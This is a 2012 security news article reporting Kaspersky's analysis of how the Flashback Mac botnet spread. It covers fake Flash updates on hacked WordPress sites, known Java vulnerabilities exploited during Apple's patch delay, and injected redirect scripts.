Social Engineering Attack from Flashback

Monday, April 23, 2012 @ 08:04 AM gHale

The Mac OS X Flashback botnet spread via drive-by downloads on hacked WordPress web sites.

From September 2011 until February 2012, the Flashback creators distributed the Trojan through compromised WordPress sites that prompted users to download various iterations of a fake Adobe Flash Player update that was, in actuality, the Mac Trojan, according to Kaspersky Lab analysis.

Malware Caught: Flashback on Wane
Malware Alert: A Scareware, Ransomware Blend
Apple Picks Off Flashback Malware
Tool to Counter Cyber Threats

The attacks started using social engineering lures and it wasn’t until February the Flashback authors began using exploits to grow the botnet. They exploited known Java vulnerabilities, at least two of which date back as far as June 2009. More importantly, though, Flashback’s creators took advantage of the window of exposure between Oracle and Apple’s patch schedules.

Apple creates its own patches to fix Java vulnerabilities instead of using Oracle’s, said Kaspersky’s Alex Gostev. So, Oracle already patched the bugs, but Apple had not yet deployed its own fixes. Gostev said on average, historically speaking, there is a two-month delay between Oracle’s fixes, which come first, and Apple’s.

In March 2012, Flashback’s authors started making use of a Russian partner program that somehow injected redirect scripts into legitimate websites.

Gostev said tens of thousands of WordPress sites suffered hits in late February and early March and noted other estimates have the number as high as 100,000 infected sites. It’s unclear how the sites became infected, but Gostev believes bloggers were either using vulnerable versions of WordPress or had installed the ToolsPack plugin.

Leave a Reply

You must be logged in to post a comment.